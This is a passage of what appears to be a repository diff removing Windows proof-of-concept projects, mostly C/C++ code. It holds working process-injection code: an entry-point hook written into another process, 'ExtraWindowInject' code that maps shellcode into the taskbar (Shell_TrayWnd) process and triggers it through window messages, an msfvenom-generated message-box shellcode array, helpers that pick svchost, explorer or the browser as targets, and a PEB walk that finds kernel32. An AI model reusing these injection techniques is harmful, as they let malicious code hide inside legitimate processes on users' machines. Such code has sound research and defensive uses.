ImageBase = getTargetImageBase2(hProcess, hThread);
} else {
#if defined(_WIN64)
printf("[ERROR] 64bit version of this method is not implemented!\n");
return false;
#else
ImageBase = getTargetImageBase1(hProcess);
#endif
}
if (ImageBase == NULL) {
printf("[ERROR] Fetching ImageBase failed!\n");
return false;
}
printf("ImageBase = 0x%p\n", ImageBase);
// read headers:
SIZE_T read_bytes = 0;
BYTE hdrs_buf[PAGE_SIZE];
if (!ReadProcessMemory(hProcess, ImageBase, hdrs_buf, sizeof(hdrs_buf), &read_bytes) && read_bytes != sizeof(hdrs_buf))
{
printf("[-] ReadProcessMemory failed\n");
return false;
}
// fetch Entry Point From headers
IMAGE_NT_HEADERS32 *inh = get_nt_hrds32(hdrs_buf);
if (inh == NULL) return false;
IMAGE_OPTIONAL_HEADER32 opt_hdr = inh->OptionalHeader;
DWORD ep_rva = opt_hdr.AddressOfEntryPoint;
printf("Entry Point v: %x\n", ep_rva);
printf("shellcode ptr: %p\n", remote_shellcode_ptr);
//make a buffer to store the hook code:
const SIZE_T kHookSize = 0x10;
BYTE hook_buffer[kHookSize];
memset(hook_buffer, 0xcc, kHookSize);
//prepare the redirection:
//address of the shellcode will be pushed on the stack and called via ret
hook_buffer[0] = 0x68; //push
hook_buffer[5] = 0xC3; //ret
//for 32bit code:
DWORD shellcode_addr = (DWORD)remote_shellcode_ptr;
memcpy(hook_buffer + 1, &shellcode_addr, sizeof(shellcode_addr));
//make a memory page containing Entry Point Writable:
DWORD oldProtect;
if (!VirtualProtectEx(hProcess, (BYTE*)ImageBase + ep_rva, kHookSize, PAGE_EXECUTE_READWRITE, &oldProtect)) {
printf("Virtual Protect Failed!\n");
return false;
}
//paste the redirection at Entry Point:
SIZE_T writen_bytes = 0;
if (!WriteProcessMemory(hProcess, (LPBYTE)ImageBase + ep_rva, hook_buffer, sizeof(hook_buffer) , &writen_bytes))
{
printf("[-] WriteProcessMemory failed, err = %d\n", GetLastError());
return false;
}
//restore the previous access rights at entry point:
DWORD oldProtect2;
if (!VirtualProtectEx(hProcess, (BYTE*)ImageBase + ep_rva, kHookSize, oldProtect, &oldProtect2)) {
printf("Virtual Protect Failed!\n");
return false;
}
return true;
}

30
Win32/Proof of Concepts/ExtraWindowInject/src/payload.h
View File

@ -1,30 +0,0 @@
#pragma once
/*
msfvenom -a x86 --platform Windows
-p windows/messagebox
TEXT="This is an injection demo!"
TITLE="Injection Demo"
-f c
*/
unsigned char g_Shellcode[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6d\x6f\x58\x20\x68\x6e\x20"
"\x44\x65\x68\x63\x74\x69\x6f\x68\x49\x6e\x6a\x65\x31\xdb\x88"
"\x5c\x24\x0e\x89\xe3\x68\x6f\x21\x58\x20\x68\x20\x64\x65\x6d"
"\x68\x74\x69\x6f\x6e\x68\x6e\x6a\x65\x63\x68\x61\x6e\x20\x69"
"\x68\x20\x69\x73\x20\x68\x54\x68\x69\x73\x31\xc9\x88\x4c\x24"
"\x1a\x89\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff"
"\x55\x08";

32
Win32/Proof of Concepts/ExtraWindowInject/src/pe_hdrs_helper.cpp
View File

@ -1,32 +0,0 @@
#include "pe_hdrs_helper.h"
IMAGE_NT_HEADERS32* get_nt_hrds32(BYTE *pe_buffer)
{
if (pe_buffer == NULL) return NULL;
IMAGE_DOS_HEADER *idh = (IMAGE_DOS_HEADER*)pe_buffer;
if (idh->e_magic != IMAGE_DOS_SIGNATURE) {
return NULL;
}
const LONG kMaxOffset = 1024;
LONG pe_offset = idh->e_lfanew;
if (pe_offset > kMaxOffset) return NULL;
IMAGE_NT_HEADERS32 *inh = (IMAGE_NT_HEADERS32 *)((BYTE*)pe_buffer + pe_offset);
return inh;
}
IMAGE_DATA_DIRECTORY* get_pe_directory32(PVOID pe_buffer, DWORD dir_id)
{
if (dir_id >= IMAGE_NUMBEROF_DIRECTORY_ENTRIES) return NULL;
//fetch relocation table from current image:
PIMAGE_NT_HEADERS32 nt_headers = get_nt_hrds32((BYTE*) pe_buffer);
if (nt_headers == NULL) return NULL;
IMAGE_DATA_DIRECTORY* peDir = &(nt_headers->OptionalHeader.DataDirectory[dir_id]);
if (peDir->VirtualAddress == NULL) {
return NULL;
}
return peDir;
}

5
Win32/Proof of Concepts/ExtraWindowInject/src/pe_hdrs_helper.h
View File

@ -1,5 +0,0 @@
#pragma once
#include <Windows.h>
IMAGE_NT_HEADERS32* get_nt_hrds32(BYTE *pe_buffer);
IMAGE_DATA_DIRECTORY* get_pe_directory32(PVOID pe_buffer, DWORD dir_id);

52
Win32/Proof of Concepts/ExtraWindowInject/src/sysutil.cpp
View File

@ -1,52 +0,0 @@
#pragma once
#include "sysutil.h"
#include <windows.h>
#include <stdio.h>
#include "pe_hdrs_helper.h"
typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
bool is_compiled_32b()
{
if (sizeof(LPVOID) == sizeof(DWORD)) {
return true;
}
return false;
}
bool is_wow64()
{
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = false;
//IsWow64Process is not available on all supported versions of Windows.
//Use GetModuleHandle to get a handle to the DLL that contains the function
//and GetProcAddress to get a pointer to the function if available.
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
if (fnIsWow64Process == NULL) {
return false;
}
if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64)) {
return false;
}
if (bIsWow64 == TRUE) {
return true; //64 bit
}
return false; //32 bit
}
bool is_system32b()
{
//is the current application 32 bit?
if (!is_compiled_32b()) {
return false;
}
//check if it is running under WoW
if (is_wow64()) {
return false;
}
return true;
}

9
Win32/Proof of Concepts/ExtraWindowInject/src/sysutil.h
View File

@ -1,9 +0,0 @@
#pragma once
#include <windows.h>
#define PAGE_SIZE 0x1000
bool is_compiled_32b();
bool is_wow64();
bool is_system32b();
bool is_target_32bit(HANDLE hProcess, LPVOID ImageBase);

117
Win32/Proof of Concepts/ExtraWindowInject/src/target_util.h
View File

@ -1,117 +0,0 @@
#pragma once
#include <wchar.h>
void replace_param(LPWSTR cmdBuf, SIZE_T cmdBufSize, LPWSTR paramVal)
{
wchar_t * pwc;
printf("--\n");
pwc = wcsstr (cmdBuf, L"%1");
if (pwc == NULL) return; //param not found
SIZE_T paramLen = wcslen(paramVal);
SIZE_T offset = pwc - cmdBuf;
if (offset + paramLen + 1 >= cmdBufSize) return; //no space in buffer
wcsncpy (pwc, paramVal, paramLen);
cmdBuf[offset + paramLen + 1] = NULL;
if (offset == 0) return;
if (cmdBuf[offset-1] == '\"' || cmdBuf[offset-1] == '\'') {
cmdBuf[offset + paramLen] = cmdBuf[0];
cmdBuf[offset + paramLen + 1] = NULL;
}
}
void remove_params(LPWSTR cmdLine, SIZE_T cmdLineLen)
{
wchar_t * pwc;
printf("--\n");
WCHAR extension[] = L".exe";
SIZE_T extensionLen = wcslen(extension);
pwc = wcsstr (cmdLine, extension);
if (pwc == NULL) return;
SIZE_T offset = pwc - cmdLine;
cmdLine[offset + extensionLen] = NULL;
if (cmdLine[0] == '\"' || cmdLine[0] == '\'') {
cmdLine[offset + extensionLen] = cmdLine[0];
cmdLine[offset + extensionLen + 1] = NULL;
}
}
bool get_dir(LPWSTR cmdLine, OUT LPWSTR dirBuf, SIZE_T dirBufLen = MAX_PATH)
{
wchar_t * pwc;
pwc = wcsrchr (cmdLine, L'\\');
if (pwc == NULL) {
pwc = wcsrchr (cmdLine, L'/');
}
if (pwc == NULL) return false;
SIZE_T offset = pwc - cmdLine + 1;
if (offset >= dirBufLen) return false;
if (cmdLine[offset] != '\"' && cmdLine[offset] != '\'') {
return false;
}
if (cmdLine[0] == '\"' || cmdLine[0] == '\'') {
wcsncpy(dirBuf, cmdLine+1, offset-1);
dirBuf[offset-1] = NULL;
} else {
wcsncpy(dirBuf, cmdLine, offset);
dirBuf[offset + 1] = NULL;
}
printf("Dir: %S\n", dirBuf);
return true;
}
bool get_default_browser(LPWSTR lpwOutPath, DWORD szOutPath)
{
HKEY phkResult;
DWORD iMaxLen = szOutPath;
LSTATUS res = RegOpenKeyEx(HKEY_CLASSES_ROOT, L"HTTP\\shell\\open\\command", 0, 1u, &phkResult);
if (res != ERROR_SUCCESS) {
printf("[ERROR] Failed with value = %x\n", res);
return false;
}
res = RegQueryValueEx(phkResult, NULL, NULL, NULL, (LPBYTE) lpwOutPath, (LPDWORD) &iMaxLen);
if (res != ERROR_SUCCESS) {
printf("[ERROR] Failed with value = %x\n", res);
return false;
}
replace_param(lpwOutPath, szOutPath, L"www.google.com");
return true;
}
bool get_calc_path(LPWSTR lpwOutPath, DWORD szOutPath)
{
#if defined(_WIN64)
ExpandEnvironmentStrings(L"%SystemRoot%\\SysWoW64\\calc.exe", lpwOutPath, szOutPath);
#else
ExpandEnvironmentStrings(L"%SystemRoot%\\system32\\calc.exe", lpwOutPath, szOutPath);
#endif
printf("%S\n", lpwOutPath);
return true;
}
bool get_svchost_path(LPWSTR lpwOutPath, DWORD szOutPath)
{
#if defined(_WIN64)
ExpandEnvironmentStrings(L"%SystemRoot%\\SysWoW64\\svchost.exe", lpwOutPath, szOutPath);
#else
ExpandEnvironmentStrings(L"%SystemRoot%\\system32\\svchost.exe", lpwOutPath, szOutPath);
#endif
printf("%S\n", lpwOutPath);
return true;
}
bool get_explorer_path(LPWSTR lpwOutPath, DWORD szOutPath)
{
ExpandEnvironmentStrings(L"%windir%\\explorer.exe", lpwOutPath, szOutPath);
printf("%S\n", lpwOutPath );
return true;
}

14
Win32/Proof of Concepts/ExtraWindowInject/src/util.h
View File

@ -1,14 +0,0 @@
#pragma once
void hex_dump(unsigned char *buf, size_t buf_size)
{
size_t pad = 8;
size_t col = 16;
putchar('\n');
for (size_t i = 0; i < buf_size; i++) {
if (i != 0 && i % pad == 0) putchar('\t');
if (i != 0 && i % col == 0) putchar('\n');
printf("%02X ", buf[i]);
}
putchar('\n');
}

115
Win32/Proof of Concepts/ExtraWindowInject/src/window_long_inject.cpp
View File

@ -1,115 +0,0 @@
#include "window_long_inject.h"
#include <stdio.h>
//for injection into Shell_TrayWnd
PVOID map_code_and_addresses_into_process(HANDLE hProcess, LPBYTE shellcode, SIZE_T shellcodeSize)
{
HANDLE hSection = NULL;
OBJECT_ATTRIBUTES hAttributes;
memset(&hAttributes, 0, sizeof(OBJECT_ATTRIBUTES));
LARGE_INTEGER maxSize;
maxSize.HighPart = 0;
maxSize.LowPart = sizeof(LONG) * 2 + shellcodeSize; //we need space for the shellcode and two pointers
NTSTATUS status = NULL;
if ((status = ZwCreateSection( &hSection, SECTION_ALL_ACCESS, NULL, &maxSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS)
{
printf("[ERROR] ZwCreateSection failed, status : %x\n", status);
return NULL;
}
PVOID sectionBaseAddress = NULL;
ULONG viewSize = 0;
SECTION_INHERIT inheritDisposition = ViewShare; //VIEW_SHARE
// map the section in context of current process:
if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(), &sectionBaseAddress, NULL, NULL, NULL, &viewSize, inheritDisposition, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
{
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
return NULL;
}
printf("Section BaseAddress: %p\n", sectionBaseAddress);
//map the new section into context of opened process
PVOID sectionBaseAddress2 = NULL;
if ((status = NtMapViewOfSection(hSection, hProcess, &sectionBaseAddress2, NULL, NULL, NULL, &viewSize, ViewShare, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
{
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
return NULL;
}
LPVOID shellcode_remote_ptr = sectionBaseAddress2;
LPVOID shellcode_local_ptr = sectionBaseAddress;
//the same page have double mapping - remote and local, so local modifications are reflected remotely
memcpy (shellcode_local_ptr, shellcode, shellcodeSize);
printf("Shellcode copied!\n");
LPVOID handles_remote_ptr = (BYTE*) shellcode_remote_ptr + shellcodeSize;
LPVOID handles_local_ptr = (BYTE*) shellcode_local_ptr + shellcodeSize;
//store the remote addresses
PVOID buf_va = (BYTE*) handles_remote_ptr;
LONG hop1 = (LONG) buf_va + sizeof(LONG);
LONG shellc_va = (LONG) shellcode_remote_ptr;
//fill the pointers
memcpy((BYTE*)handles_local_ptr, &hop1, sizeof(LONG));
memcpy((BYTE*)handles_local_ptr + sizeof(LONG), &shellc_va, sizeof(LONG));
//unmap from the context of current process
ZwUnmapViewOfSection(GetCurrentProcess(), sectionBaseAddress);
ZwClose(hSection);
printf("Section mapped at address: %p\n", sectionBaseAddress2);
return shellcode_remote_ptr;
}
bool inject_into_tray(LPBYTE shellcode, SIZE_T shellcodeSize)
{
HWND hWnd = FindWindow(L"Shell_TrayWnd", NULL);
if (hWnd == NULL) return false;
DWORD pid = 0;
GetWindowThreadProcessId(hWnd, &pid);
printf("PID:\t%d\n", pid);
//save the current value, because we will need to recover it:
LONG winLong = GetWindowLongW(hWnd, 0);
printf("WindowLong:\t%lx\n", winLong);
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, false, pid);
if (hProcess == NULL) {
return false;
}
LPVOID remote_shellcode_ptr = map_code_and_addresses_into_process(hProcess, shellcode, shellcodeSize);
if (remote_shellcode_ptr == NULL) {
return false;
}
LPVOID remote_handles_ptr = (BYTE*) remote_shellcode_ptr + shellcodeSize;
printf("Saving handles to:\t%p\n", remote_handles_ptr);
//set the handle to the injected:
SetWindowLong(hWnd, 0, (LONG) remote_handles_ptr);
//send signal to execute the injected code
SendNotifyMessage(hWnd, WM_PAINT, 0, 0);
//procedure will be triggered on every message
//in order to avoid repetitions, injected code should restore the previous value after the first exection
//here we are checking if it is done
size_t max_wait = 5;
while (GetWindowLong(hWnd, 0) != winLong) {
//not restored, wait more
Sleep(100);
if ((max_wait--) == 0) {
//don't wait longer, restore by yourself
SetWindowLong(hWnd, 0, winLong);
SendNotifyMessage(hWnd, WM_PAINT, 0, 0);
}
}
CloseHandle(hProcess);
return true;
}

6
Win32/Proof of Concepts/ExtraWindowInject/src/window_long_inject.h
View File

@ -1,6 +0,0 @@
#pragma once
#include <Windows.h>
#include "ntddk.h"
bool inject_into_tray(LPBYTE shellcode, SIZE_T shellcodeSize);

26
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64.sln
View File

@ -1,26 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GetKernel32Addressx64", "GetKernel32Addressx64\GetKernel32Addressx64.vcxproj", "{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Debug|Win32.ActiveCfg = Debug|Win32
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Debug|Win32.Build.0 = Debug|Win32
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Debug|x64.ActiveCfg = Debug|x64
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Debug|x64.Build.0 = Debug|x64
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Release|Win32.ActiveCfg = Release|Win32
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Release|Win32.Build.0 = Release|Win32
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Release|x64.ActiveCfg = Release|x64
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

59
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/GetKernel32Addressx64.cpp
View File

@ -1,59 +0,0 @@
// GetKernel32Addressx64.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "GetKernel32Addressx64.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// 唯一的应用程序对象
CWinApp theApp;
using namespace std;
#include<windows.h>
extern "C" PVOID64 _cdecl GetPeb();
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
}UNICODE_STRING, *PUNICODE_STRING;
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
PVOID64 Peb = NULL;
PVOID64 LDR_DATA_Addr = NULL;
UNICODE_STRING* FullName;
HMODULE hKernel32 = NULL;
LIST_ENTRY* pNode = NULL;
// For win7 x64 TEST
Peb = GetPeb();
if(Peb == NULL)
return 0;
LDR_DATA_Addr = *(PVOID64**)((BYTE*)Peb+0x018);
if(LDR_DATA_Addr == NULL)
return 0;
pNode =(LIST_ENTRY*)(*(PVOID64**)((BYTE*)LDR_DATA_Addr+0x30));
while(true)
{
FullName = (UNICODE_STRING*)((BYTE*)pNode+0x38);
if(*(FullName->Buffer + 12) == '\0')
{
hKernel32 = (HMODULE)(*((ULONG64*)((BYTE*)pNode+0x10)));
break;
}
pNode = pNode->Flink;
}
printf("%S : %p",FullName->Buffer,hKernel32);
return 0;
}

3
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/GetKernel32Addressx64.h
View File

@ -1,3 +0,0 @@
#pragma once
#include "resource.h"

BIN
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/GetKernel32Addressx64.rc
View File

Binary file not shown.

176
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/GetKernel32Addressx64.vcxproj
View File

@ -1,176 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>GetKernel32Addressx64</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="GetKernel32Addressx64.h" />
<ClInclude Include="Resource.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="GetKernel32Addressx64.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="GetKernel32Addressx64.rc" />
</ItemGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<MASM Include="GetPeb.asm">
<IncludePaths Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">C:\Users\TyLtw\Documents\Visual Studio 2010\Projects\GetKernel32Addressx64;%(IncludePaths)</IncludePaths>
</MASM>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

52
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/GetKernel32Addressx64.vcxproj.filters
View File

@ -1,52 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="GetKernel32Addressx64.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="GetKernel32Addressx64.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="GetKernel32Addressx64.rc">
<Filter>资源文件</Filter>
</ResourceCompile>
</ItemGroup>
<ItemGroup>
<MASM Include="GetPeb.asm">
<Filter>源文件</Filter>
</MASM>
</ItemGroup>
</Project>

7
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/GetPeb.asm
View File

@ -1,7 +0,0 @@
.CODE
